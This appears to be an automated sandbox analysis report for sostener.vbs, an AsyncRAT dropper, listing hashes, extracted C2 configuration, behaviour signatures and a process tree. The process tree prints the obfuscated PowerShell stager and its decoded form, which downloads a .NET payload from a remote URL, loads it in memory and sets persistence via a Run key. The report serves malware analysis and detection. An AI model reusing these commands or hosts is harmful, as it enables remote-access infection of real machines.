Overview

overview

10

Static

static

1

sostener.vbs

windows7-x64

10

sostener.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    136s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240910-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240910-enlocale:en-usos:windows10-2004-x64system
  • submitted
    26-09-2024 08:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    sostener.vbs

  • Size

    438KB

  • MD5

    7038e85f1e6e6405981b64ff58358482

  • SHA1

    9df67362f01d7a33a02a708fa6da1c3a1214fc51

  • SHA256

    a1a8e23d2f66e05da76366469a1a344973fb1d775a943656de0f90bf0306e447

  • SHA512

    e9bc9b726b17f8f513d36054647537d6e494bfb0087306ca52ca0f1f95785afa705ede98baaf71f19fead408f434a061a34ac6f0c457b0b77bdc51f93005c676

  • SSDEEP

    96:OffffUffffUfffflDXc7lYm8ky0xbFi1msE4VIAGYALFCN8V0bf:s7OlYm8kyIhi1msJVIAGYAZCN8qf

Score
10/10
asyncratserverdiscoveryexecutionpersistencerat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Server

C2

dcmxz.duckdns.org:35650

Mutex

DcRatMutex_qwqdanchun

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sostener.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3012
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J▒Bz▒HE▒YQBh▒Go▒I▒▒9▒C▒▒Jw▒w▒DE▒Mw▒n▒Ds▒J▒B3▒Gk▒a▒Bs▒HY▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒Bu▒G4▒dQBv▒GE▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒dwB3▒Hc▒LgBp▒G4▒ZgBv▒HI▒bQBh▒GM▒aQBv▒G4▒bwBw▒G8▒cgB0▒HU▒bgBh▒C4▒YwBv▒G0▒LwB3▒H▒▒LQBj▒G8▒bgB0▒GU▒bgB0▒C8▒dQBw▒Gw▒bwBh▒GQ▒cw▒v▒DI▒M▒▒y▒DQ▒Lw▒w▒Dk▒LwBk▒Gw▒b▒Bz▒Gs▒eQBm▒GE▒b▒▒u▒HQ▒e▒B0▒Cc▒KQ▒p▒Ds▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EE▒c▒Bw▒EQ▒bwBt▒GE▒aQBu▒F0▒Og▒6▒EM▒dQBy▒HI▒ZQBu▒HQ▒R▒Bv▒G0▒YQBp▒G4▒LgBM▒G8▒YQBk▒Cg▒J▒Bu▒G4▒dQBv▒GE▒KQ▒u▒Ec▒ZQB0▒FQ▒eQBw▒GU▒K▒▒n▒EM▒b▒Bh▒HM▒cwBM▒Gk▒YgBy▒GE▒cgB5▒DE▒LgBD▒Gw▒YQBz▒HM▒MQ▒n▒Ck▒LgBH▒GU▒d▒BN▒GU▒d▒Bo▒G8▒Z▒▒o▒Cc▒WgB4▒Es▒S▒BH▒Cc▒KQ▒u▒Ek▒bgB2▒G8▒awBl▒Cg▒J▒Bu▒HU▒b▒Bs▒Cw▒I▒Bb▒G8▒YgBq▒GU▒YwB0▒Fs▒XQBd▒C▒▒K▒▒n▒HQ▒e▒B0▒C4▒MQBT▒EQ▒LwBT▒FY▒TgBF▒C8▒egBy▒GE▒TQ▒v▒Gc▒ZQBS▒C8▒awBh▒FQ▒Lw▒5▒DY▒MQ▒u▒DM▒Mw▒y▒C4▒Mg▒w▒DI▒Lg▒x▒Dk▒Lw▒v▒Do▒c▒B0▒HQ▒a▒▒n▒C▒▒L▒▒g▒CQ▒dwBp▒Gg▒b▒B2▒C▒▒L▒▒g▒Cc▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒Jw▒s▒C▒▒J▒Bz▒HE▒YQBh▒Go▒L▒▒g▒Cc▒MQ▒n▒Cw▒I▒▒n▒FI▒bwBk▒GE▒Jw▒g▒Ck▒KQ▒7▒▒==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1036
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sqaaj = '013';$wihlv = 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs';[Byte[]] $nnuoa = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://www.informacionoportuna.com/wp-content/uploads/2024/09/dllskyfal.txt'));[system.AppDomain]::CurrentDomain.Load($nnuoa).GetType('ClassLibrary1.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('txt.1SD/SVNE/zraM/geR/kaT/961.332.202.19//:ptth' , $wihlv , '_______________________-------------', $sqaaj, '1', 'Roda' ));"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1444
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2944
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
            5⤵
            • Adds Run key to start application
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3680
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\sostener.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3472
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:1884

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    6cf293cb4d80be23433eecf74ddb5503

    SHA1

    24fe4752df102c2ef492954d6b046cb5512ad408

    SHA256

    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

    SHA512

    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    548dd08570d121a65e82abb7171cae1c

    SHA1

    1a1b5084b3a78f3acd0d811cc79dbcac121217ab

    SHA256

    cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

    SHA512

    37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    dfe0cf053041cfe7a15229c01dd65d51

    SHA1

    927b0946e40d4ecd812cba9fd7cc55fe40ca503a

    SHA256

    e561ecaf45c067643e2e8c19c800865976b2362e5d2b8e558521ef9c3d638a39

    SHA512

    0adb787cead1838fa3f2ef1917dcf054a6213be6bb7d51a9286baf7f10373c7a0914b3b441eb616a3688dce63317d39553e43b8b95b53053681134daaeb0f2d1

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    6fe7f2ff9f024b0658a4113e39b826fc

    SHA1

    07a0d4ec3b19b62fd409ddb60e843021ac40f1f3

    SHA256

    e8f1c76e1435d42070f4d6c600c2301710b291674c00ef9c069508f0fea69cf1

    SHA512

    64448c79c9070cbc179df72420c1d86d10ea2ff8ae0d9c3fed5676851cb45a64e65a9d637a1f8f41ecf4dc51c3d5ff8a689519d9ea13d9837b3f9cfaddd13979

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    64B

    MD5

    5caad758326454b5788ec35315c4c304

    SHA1

    3aef8dba8042662a7fcf97e51047dc636b4d4724

    SHA256

    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

    SHA512

    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mdmmnjmx.kbd.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\xx1.ps1
    Filesize

    265B

    MD5

    3613b0cfa9cd66b5bc0bc4aabe147838

    SHA1

    94bb2a7ae944b9906f95ac19bd3fd199a4396a6b

    SHA256

    6bc7c43d63f298a0078345bac278b90076521d73259fc34f046df021d738f653

    SHA512

    282e0d1543850ea5affae87b3e66d1ffbf837c1f2c976843874dc6f0746bb989b18b9ff0be74726165cd8dbdb64068d21f9bd44f04eef5764e1f14fccd31698b

    Download Submit

  • memory/1036-12-0x00007FFDB9230000-0x00007FFDB9CF1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1036-0-0x00007FFDB9233000-0x00007FFDB9235000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1036-11-0x00007FFDB9230000-0x00007FFDB9CF1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1036-10-0x0000019159D40000-0x0000019159D62000-memory.dmp

    Filesize

    136KB

    Download

  • memory/1036-77-0x00007FFDB9230000-0x00007FFDB9CF1000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/1444-22-0x000001ECF92A0000-0x000001ECF92A8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/1444-71-0x000001ECF9420000-0x000001ECF942A000-memory.dmp

    Filesize

    40KB

    Download

  • memory/1884-72-0x0000000000400000-0x0000000000412000-memory.dmp

    Filesize

    72KB

    Download

  • memory/1884-80-0x0000000005C80000-0x0000000005D1C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/1884-81-0x00000000062D0000-0x0000000006874000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/1884-82-0x0000000005D90000-0x0000000005DF6000-memory.dmp

    Filesize

    408KB

    Download